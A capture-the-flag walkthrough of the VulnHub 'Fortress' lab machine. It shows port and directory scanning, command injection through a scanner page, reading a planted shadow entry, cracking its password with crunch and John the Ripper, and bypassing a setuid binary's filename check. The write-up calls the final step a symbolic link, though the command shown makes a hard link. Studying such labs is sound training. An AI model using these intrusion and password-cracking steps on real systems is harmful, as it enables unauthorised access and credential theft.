DC416 CTF CHALLENGES [FORTRESS]
Location
https://download.vulnhub.com/dc416-2016/dc416-fortress.ova
Introduction
This is one of four virtual machines that were created by members of the VulnHub CTF Team for DefCon Toronto’s first offline CTF.
This machine was created by superkojiman
Each machine has a landing page on port 80 which describes the number of flags it has, along with any additional rules or hints.
Getting Started
First a nmap scan.
┌─[✗]─[n13mant@planetmars]─[~] └──╼ $nmap -A -T4 -sV -p- 192.168.171.3 Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-10 09:56 CET Nmap scan report for 192.168.171.3 Host is up (0.00049s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2 (FreeBSD 20160310; protocol 2.0) | ssh-hostkey: | 2048 3a:34:82:2b:86:e3:2a:e4:2c:34:18:85:f9:94:7c:69 (RSA) |_ 256 78:79:e2:ed:27:e3:43:77:0b:07:d2:03:bb:7f:c1:02 (ECDSA) 80/tcp open http Apache httpd 2.4.23 ((FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27) |_http-server-header: Apache/2.4.23 (FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27 |_http-title: Did not follow redirect to https://192.168.171.3/ 443/tcp open ssl/http Apache httpd 2.4.23 ((FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.23 (FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27 |_http-title: fortress | ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=ON/countryName=CA | Not valid before: 2016-11-05T05:05:36 |_Not valid after: 2017-11-05T05:05:36 |_ssl-date: TLS randomness does not represent time Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 101.63 seconds
Looks like there are 3 open ports. And port 80 is redirecting to port 443.
I’ll try and do some banner grabbing before I start with port 80.
Nothing there but the info I already got from the nmap scan.
When visiting the website on port 80 I get redirected to port 443. Here are the rules of engagement noted.
To enumerate some directories I use dirsearch which finds /scanner.php/.
┌─[n13mant@planetmars]─[~/Desktop/dirsearch] └──╼ $python3 dirsearch.py -u "https://192.168.171.3/" -e php -w /home/n13mant/Documents/dirsearch/db/dicc.txt -f -F -r -x 403,404 -t 10 _|. _ _ _ _ _ _|_ v0.3.7 (_||| _) (/_(_|| (_| ) Extensions: php | Threads: 10 | Wordlist size: 9914 Error Log: /home/n13mant/Documents/dirsearch/logs/errors-17-01-10_13-26-57.log Target: https://192.168.171.3/ [13:26:57] Starting: [13:27:32] 200 - 561B - /index.html [13:27:45] 200 - 370B - /scanner.php Task Completed
Looks like an excellent vector for remote code execution (RCE).
Because I want to know if I can append some arbitrary code I start to add some chars and see what the result is. After I use the pipe char (|) I get a pat on the back – much appreciated LOL.
Because I wanted to know what was happening behind the scene, I used Burpsuite to capture the traffic. From there I sent the request to the repeater and try to execute code by bypassing the filter. After some time I find out that a simple break did the trick.
Next I’m using the command ls -aRl.
drwxr-xr-x 4 root wheel 512 Nov 9 20:24 . drwxr-xr-x 6 root wheel 512 Nov 9 19:58 .. -rw-r--r-- 1 root wheel 561 Nov 8 23:51 index.html drwxr-xr-x 2 root wheel 512 Nov 9 20:22 k1ngd0m_k3yz -rw-r--r-- 1 root wheel 44867 Nov 4 00:46 logo.png drwxr-xr-x 2 root wheel 512 Nov 9 20:22 s1kr3t -rw-r--r-- 1 root wheel 759 Nov 5 00:50 scanner.php -rw-r--r-- 1 root wheel 612 Nov 4 01:01 styles.css ./k1ngd0m_k3yz: total 32 drwxr-xr-x 2 root wheel 512 Nov 9 20:22 . drwxr-xr-x 4 root wheel 512 Nov 9 20:24 .. -rw-r--r-- 1 root wheel 157 Nov 9 19:53 master -rw-r--r-- 1 root wheel 47 Nov 9 19:54 passwd ./s1kr3t: total 24 drwxr-xr-x 2 root wheel 512 Nov 9 20:22 . drwxr-xr-x 4 root wheel 512 Nov 9 20:24 .. -rw-r--r-- 1 root wheel 31 Nov 4 18:08 flag.txt
cat ./s1kr3t/flag.txt
FLAG{n0_one_br3aches_teh_f0rt}
cat ./k1ngd0m_k3yz/master craven:$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:1002:1002::0:0:User &:/home/craven:/bin/sh
cat ./k1ngd0m_k3yz/passwd craven:*:1002:1002:User &:/home/craven:/bin/sh
So I got the first flag and the passwd and shadow file of user “craven”.
First I’m going to gather the location of the remaining flags.
find / -name "flag*" /usr/local/www/apache24/data/s1kr3t/flag.txt /usr/home/vulnhub/flag.txt /usr/home/craven/flag.txt
ls -lah /usr/home/vulnhub drwxr-xr-x 2 vulnhub vulnhub 512B Nov 8 20:27 . drwxr-xr-x 4 root wheel 512B Nov 5 01:59 .. -rw-r--r-- 1 vulnhub vulnhub 1.0K Nov 1 23:43 .cshrc -rw-r--r-- 1 vulnhub vulnhub 254B Nov 1 23:43 .login -rw-r--r-- 1 vulnhub vulnhub 163B Nov 1 23:43 .login_conf -rw------- 1 vulnhub vulnhub 379B Nov 1 23:43 .mail_aliases -rw-r--r-- 1 vulnhub vulnhub 336B Nov 1 23:43 .mailrc -rw-r--r-- 1 vulnhub vulnhub 802B Nov 1 23:43 .profile -rw------- 1 vulnhub vulnhub 281B Nov 1 23:43 .rhosts -rw-r--r-- 1 vulnhub vulnhub 978B Nov 1 23:43 .shrc -r-------- 1 vulnhub vulnhub 26B Nov 8 20:08 flag.txt -rwsr-xr-x 1 vulnhub vulnhub 8.8K Nov 8 20:15 reader
ls -lah /usr/home/craven drwxr-xr-x 2 craven craven 512B Nov 9 19:58 . drwxr-xr-x 4 root wheel 512B Nov 5 01:59 .. -rw-r--r-- 1 craven craven 1.0K Nov 5 01:59 .cshrc -rw------- 1 craven craven 5B Nov 7 20:24 .gdb_history -rw-r--r-- 1 craven craven 60B Nov 7 20:36 .gdbinit -rw-r--r-- 1 craven craven 254B Nov 5 01:59 .login -rw-r--r-- 1 craven craven 163B Nov 5 01:59 .login_conf -rw------- 1 craven craven 379B Nov 5 01:59 .mail_aliases -rw-r--r-- 1 craven craven 336B Nov 5 01:59 .mailrc -rw-r--r-- 1 craven craven 802B Nov 5 01:59 .profile -rw------- 1 craven craven 281B Nov 5 01:59 .rhosts -rw-r--r-- 1 craven craven 978B Nov 5 01:59 .shrc -r-------- 1 craven craven 46B Nov 6 01:30 flag.txt -rw-r--r-- 1 craven craven 119B Nov 5 02:23 hint.txt -rw-r--r-- 1 craven craven 77B Nov 5 02:20 reminders.txt
So the flags I can’t read yet, but there are some files I can.
cat /usr/home/craven/hint.txt Keep forgetting my password, so I made myself a hint. Password is three digits followed by my pet's name and a symbol.
cat /usr/home/craven/reminders.txt To buy: * skim milk * organic free-run eggs * dog bone for qwerty * sriracha
So…..the name of the pet is probably “qwerty”. Leaving my to create a list with crunch.
┌─[n13mant@planetmars]─[~/Desktop] └──╼ $crunch 10 10 -t %%%qwerty^ -o craven.lst Crunch will now generate the following amount of data: 363000 bytes 0 MB 0 GB 0 TB 0 PB Crunch will now generate the following number of lines: 33000 crunch: 100% completed generating output
Now to load this up with John the Ripper.
┌─[n13mant@planetmars]─[~/Desktop/john] └──╼ $unshadow ./etc/passwd ./etc/shadow > mypasswd ┌─[n13mant@planetmars]─[~/Desktop/john] └──╼ $john mypasswd --wordlist=craven.lst Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt" Use the "--format=crypt" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x]) Press 'q' or Ctrl-C to abort, almost any other key for status 931qwerty? (craven) 1g 0:00:00:57 DONE (2017-01-10 14:46) 0.01740g/s 535.9p/s 535.9c/s 535.9C/s 930qwerty?..932qwerty> Use the "--show" option to display all of the cracked passwords reliably Session completed ┌─[✗]─[n13mant@planetmars]─[~/Desktop/john] └──╼ $john --show mypasswd craven:931qwerty?:1002:1002:User &:/home/craven:/bin/sh 1 password hash cracked, 0 left
Now that I have the password it’s time to ssh my way in as “craven”.
┌─[n13mant@planetmars]─[~]
└──╼ $ssh craven@192.168.171.3 -p 22
The authenticity of host '192.168.171.3 (192.168.171.3)' can't be established.
ECDSA key fingerprint is SHA256:ekOYTIfPK3fRGCYD3FHMkmfiN13ShRbk7a7gF0CIQd8.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/n13mant/.ssh/known_hosts).
Password for craven@fortress:
Last login: Tue Nov 8 19:52:08 2016 from 192.168.208.1
FreeBSD 11.0-RELEASE-p1 (GENERIC) #0 r306420: Thu Sep 29 01:43:23 UTC 2016
Welcome to FreeBSD!
Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories: https://www.FreeBSD.org/security/
FreeBSD Handbook: https://www.FreeBSD.org/handbook/
FreeBSD FAQ: https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums: https://forums.FreeBSD.org/
Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with: pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.
Show the version of FreeBSD installed: freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages: man man
FreeBSD directory layout: man hier
Edit /etc/motd to change this login announcement.
Any user that is a member of the wheel group can use "su -" to simulate
a root login. You can add a user to the wheel group by editing /etc/group.
-- Konstantinos Konstantinidis <kkonstan@duth.gr>
First I take my second flag.
$ pwd
/usr/home/craven
$ ls -lah
total 60
drwxr-xr-x 2 craven craven 512B Nov 9 19:58 .
drwxr-xr-x 4 root wheel 512B Nov 5 01:59 ..
-rw-r--r-- 1 craven craven 1.0K Nov 5 01:59 .cshrc
-rw------- 1 craven craven 5B Nov 7 20:24 .gdb_history
-rw-r--r-- 1 craven craven 60B Nov 7 20:36 .gdbinit
-rw-r--r-- 1 craven craven 254B Nov 5 01:59 .login
-rw-r--r-- 1 craven craven 163B Nov 5 01:59 .login_conf
-rw------- 1 craven craven 379B Nov 5 01:59 .mail_aliases
-rw-r--r-- 1 craven craven 336B Nov 5 01:59 .mailrc
-rw-r--r-- 1 craven craven 802B Nov 5 01:59 .profile
-rw------- 1 craven craven 281B Nov 5 01:59 .rhosts
-rw-r--r-- 1 craven craven 978B Nov 5 01:59 .shrc
-r-------- 1 craven craven 46B Nov 6 01:30 flag.txt
-rw-r--r-- 1 craven craven 119B Nov 5 02:23 hint.txt
-rw-r--r-- 1 craven craven 77B Nov 5 02:20 reminders.txt
$ cat flag.txt
FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}
Next stop is user “vulnhub” and his flag.
$ cd vulnhub $ ls -lah total 56 drwxr-xr-x 2 vulnhub vulnhub 512B Nov 8 20:27 . drwxr-xr-x 4 root wheel 512B Nov 5 01:59 .. -rw-r--r-- 1 vulnhub vulnhub 1.0K Nov 1 23:43 .cshrc -rw-r--r-- 1 vulnhub vulnhub 254B Nov 1 23:43 .login -rw-r--r-- 1 vulnhub vulnhub 163B Nov 1 23:43 .login_conf -rw------- 1 vulnhub vulnhub 379B Nov 1 23:43 .mail_aliases -rw-r--r-- 1 vulnhub vulnhub 336B Nov 1 23:43 .mailrc -rw-r--r-- 1 vulnhub vulnhub 802B Nov 1 23:43 .profile -rw------- 1 vulnhub vulnhub 281B Nov 1 23:43 .rhosts -rw-r--r-- 1 vulnhub vulnhub 978B Nov 1 23:43 .shrc -r-------- 1 vulnhub vulnhub 26B Nov 8 20:08 flag.txt -rwsr-xr-x 1 vulnhub vulnhub 8.8K Nov 8 20:15 reader $ file reader reader: setuid ELF 64-bit LSB executable, x86-64, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 11.0 (1100122), FreeBSD-style, not stripped $ ltrace reader -sh: ltrace: not found $ strings reader /libexec/ld-elf.so.1 FreeBSD FreeBSD _Jv_RegisterClasses libc.so.7 __progname environ printf lstat fopen puts strstr sleep _init_tls fclose memset fgets atexit _end FBSD_1.0 AWAVAUATSPI ffff. u*UH fff. %s [file to read] Checking file type... Symbolic links not allowed! Checking if flag file... flag Nope. Can't let you have the flag. Great! Printing file contents... Win, here's your flag:
This time I run the program.
$ ./reader ./reader [file to read] $ ./reader flag.txt Checking file type... Checking if flag file... Nope. Can't let you have the flag.
Let’s do some testing first.
$ echo "testing" > /tmp/test.txt $ ./reader /tmp/test.txt Checking file type... Checking if flag file... Great! Printing file contents... Win, here's your flag: testing
$ echo 'not the real flag' > /tmp/flag.txt $ ./reader /tmp/flag.txt Checking file type... Checking if flag file... Nope. Can't let you have the flag.
So it’s basically just checking the filename. If it’s “flag” it will deny access to it. Else it will echo the content.
To bypass this mechanism I’m going to make a symbolic link to the real “flag.txt”.
$ ln /usr/home/vulnhub/flag.txt /tmp/needo
$ ./reader /tmp/needo
Checking file type...
Checking if flag file...
Great! Printing file contents...
Win, here's your flag:
FLAG{its_A_ph0t0_ph1ni5h}
And there is the final flag.